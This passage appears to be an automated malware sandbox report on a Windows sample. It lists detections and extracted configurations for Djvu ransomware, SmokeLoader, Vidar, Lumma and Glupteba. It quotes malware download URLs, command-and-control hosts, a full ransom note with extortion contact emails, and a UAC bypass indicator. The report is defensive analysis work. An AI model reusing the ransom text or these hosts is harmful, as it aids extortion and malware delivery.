            Source: http://sajdfue.com/files/1/build3.exe$runAvira URL Cloud: Label: malware
            Source: http://sajdfue.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=trueAvira URL Cloud: Label: malware
            Source: http://sajdfue.com/files/1/build3.exerun85Avira URL Cloud: Label: malware
            Source: problemregardybuiwo.funAvira URL Cloud: Label: malware
            Source: https://resergvearyinitiani.shop/api5Avira URL Cloud: Label: malware
            Source: https://resergvearyinitiani.shop/TAvira URL Cloud: Label: malware
            Source: http://sdfjhuz.com/dl/build2.exe:Avira URL Cloud: Label: malware
            Source: https://resergvearyinitiani.shop/.Avira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\build2[1].exeAvira: detection malicious, Label: HEUR/AGEN.1352954
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeAvira: detection malicious, Label: HEUR/AGEN.1313019
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\build3[1].exeAvira: detection malicious, Label: TR/AD.MalwareCrypter.llbpm
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeAvira: detection malicious, Label: TR/Crypt.EPACK.Gen2
            Found malware configuration
            Source: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Djvu {"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://sajdfue.com/files/1/build3.exe"], "C2 url": "http://sajdfue.com/test1/get.php", "Ransom note file": "_README.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/3ed7a617738550b0a00c5aa231c0752020240316170955/d71ce1\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0857PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E
            Source: 00000006.00000002.2358331788.0000000000C80000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://trad-einmyus.com/index.php", "http://tradein-myus.com/index.php", "http://trade-inmyus.com/index.php"]}
            Source: 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199658817715"], "Botnet": "5739ef2bbcd39fcd59c5746bfe4238c5", "Version": "8.6"}
            Source: A0B.exe.5352.23.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "edurestunningcrackyow.fun", "detectordiscusser.shop", "problemregardybuiwo.fun", "lighterepisodeheighte.fun", "lighterepisodeheighte.fun", "technologyenterdo.shop", "resergvearyinitiani.shop"], "Build id": "GhJLkO--seevpalpadin"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\build2[1].exeReversingLabs: Detection: 75%
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\build3[1].exeReversingLabs: Detection: 86%
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeReversingLabs: Detection: 91%
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeReversingLabs: Detection: 75%
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exeReversingLabs: Detection: 86%
            Source: C:\Users\user\AppData\Roaming\gtdiratReversingLabs: Detection: 31%
            Multi AV Scanner detection for submitted file
            Source: 6uVlPQSJ4e.exeReversingLabs: Detection: 31%
            Yara detected Glupteba
            Source: Yara matchFile source: 44.3.71C9.exe.39e0000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 29.2.71C9.exe.3190e67.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 44.2.71C9.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 44.2.71C9.exe.30f0e67.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 29.3.71C9.exe.3a80000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 29.2.71C9.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002C.00000003.3174084489.0000000003E22000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002C.00000002.4516603892.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 71C9.exe PID: 6944, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 71C9.exe PID: 3208, type: MEMORYSTR
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\build3[1].exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: 6uVlPQSJ4e.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,12_2_0040E870
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040EA51 CryptDestroyHash,CryptReleaseContext,12_2_0040EA51
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,12_2_0040EAA0
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040EC68 CryptDestroyHash,CryptReleaseContext,12_2_0040EC68
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,12_2_00410FC0
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00411178 CryptDestroyHash,CryptReleaseContext,12_2_00411178
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,17_2_0040E870
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,17_2_0040EAA0
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,17_2_00410FC0
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_00411178 CryptDestroyHash,CryptReleaseContext,17_2_00411178
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040EA51 CryptDestroyHash,CryptReleaseContext,17_2_0040EA51
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040EC68 CryptDestroyHash,CryptReleaseContext,17_2_0040EC68

            Privilege Escalation

            barindex
            UAC bypass detected (Fodhelper)
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeRegistry value created: DelegateExecute
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeRegistry value created: NULL "C:\Users\user\AppData\Local\Temp\71C9.exe"

            Bitcoin Miner

            barindex
            Yara detected Glupteba
            Source: Yara matchFile source: 44.3.71C9.exe.39e0000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 29.2.71C9.exe.3190e67.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 44.2.71C9.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 44.2.71C9.exe.30f0e67.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 29.3.71C9.exe.3a80000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 29.2.71C9.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002C.00000003.3174084489.0000000003E22000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002C.00000002.4516603892.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 71C9.exe PID: 6944, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 71C9.exe PID: 3208, type: MEMORYSTR

            Compliance

            barindex
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeUnpacked PE file: 12.2.DB15.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeUnpacked PE file: 17.2.DB15.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeUnpacked PE file: 19.2.DB15.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeUnpacked PE file: 22.2.DB15.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeUnpacked PE file: 28.2.DB15.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeUnpacked PE file: 29.2.71C9.exe.400000.5.unpack
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeUnpacked PE file: 41.2.build2.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeUnpacked PE file: 44.2.71C9.exe.400000.5.unpack
            Source: 6uVlPQSJ4e.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeFile created: C:\Users\user\_README.txtJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeFile created: C:\_README.txt
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeFile created: C:\$WinREAgent\_README.txt
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeFile created: C:\$WinREAgent\Scratch\_README.txt
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.6:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.6:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.6:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.6:49719 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49722 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 192.185.16.114:443 -> 192.168.2.6:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49724 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.253.115.138:443 -> 192.168.2.6:49727 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49729 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49729 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.207.127:443 -> 192.168.2.6:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.6:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.156.20:443 -> 192.168.2.6:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.6:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.105.90.131:443 -> 192.168.2.6:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 78.46.229.36:443 -> 192.168.2.6:49741 version: TLS 1.2
            Source: Binary string: mozglue.pdbP source: build2.exe, 00000029.00000002.3578472192.000000006C48D000.00000002.00000001.01000000.0000001B.sdmp
            Source: Binary string: Loader.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: YC:\kowad\hur_xez bejuwud_nucasa25 nima49\ler.pdb source: 6uVlPQSJ4e.exe, 00000000.00000000.2055147362.0000000000410000.00000002.00000001.01000000.00000003.sdmp, 6uVlPQSJ4e.exe, 00000000.00000002.2119831662.0000000000410000.00000002.00000001.01000000.00000003.sdmp, gtdirat, 00000006.00000000.2306948780.0000000000410000.00000002.00000001.01000000.00000005.sdmp, gtdirat, 00000006.00000002.2358003231.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: nss3.pdb@ source: build2.exe, 00000029.00000002.3579393951.000000006C64F000.00000002.00000001.01000000.0000001A.sdmp
            Source: Binary string: EfiGuardDxe.pdb7 source: 71C9.exe, 0000001D.00000002.3181347032.0000000002D88000.00000040.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\kowad\hur_xez bejuwud_nucasa25 nima49\ler.pdb source: 6uVlPQSJ4e.exe, 00000000.00000000.2055147362.0000000000410000.00000002.00000001.01000000.00000003.sdmp, 6uVlPQSJ4e.exe, 00000000.00000002.2119831662.0000000000410000.00000002.00000001.01000000.00000003.sdmp, gtdirat, 00000006.00000000.2306948780.0000000000410000.00000002.00000001.01000000.00000005.sdmp, gtdirat, 00000006.00000002.2358003231.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: symsrv.pdb source: 71C9.exe, 0000001D.00000002.3185463938.0000000003A09000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000C7A000.00000040.00000001.01000000.0000000B.sdmp
            Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: !?C:\fub15\jekofesero\faduporixe_yaf.pdb source: DB15.exe, 0000000B.00000002.2819787929.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 0000000B.00000000.2817926575.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 0000000C.00000000.2819249973.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000010.00000002.2841208220.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000010.00000000.2836193602.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000011.00000000.2839475530.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000012.00000002.2842579793.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000012.00000000.2839477285.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000013.00000000.2840959577.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000015.00000000.2960769899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000015.00000002.2966350391.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000016.00000000.2964684710.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001B.00000002.3049973246.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001B.00000000.3044970773.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001C.00000000.3046708932.0000000000410000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: mozglue.pdb source: build2.exe, 00000029.00000002.3578472192.000000006C48D000.00000002.00000001.01000000.0000001B.sdmp
            Source: Binary string: C:\bap\xipuvi-g.pdb source: 71C9.exe, 0000001D.00000000.3076477137.0000000000410000.00000002.00000001.01000000.0000000B.sdmp
            Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: DB15.exe, DB15.exe, 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000012.00000002.2843694068.0000000002890000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000015.00000002.2971579481.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 0000001B.00000002.3053638727.0000000002840000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: Unable to locate the .pdb file in this location source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: The module signature does not match with .pdb signature. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: .pdb.dbg source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: '(EfiGuardDxe.pdbx source: 71C9.exe, 0000001D.00000003.3083456233.000000000414B000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: symsrv.pdbGCTL source: 71C9.exe, 0000001D.00000002.3185463938.0000000003A09000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000C7A000.00000040.00000001.01000000.0000000B.sdmp
            Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
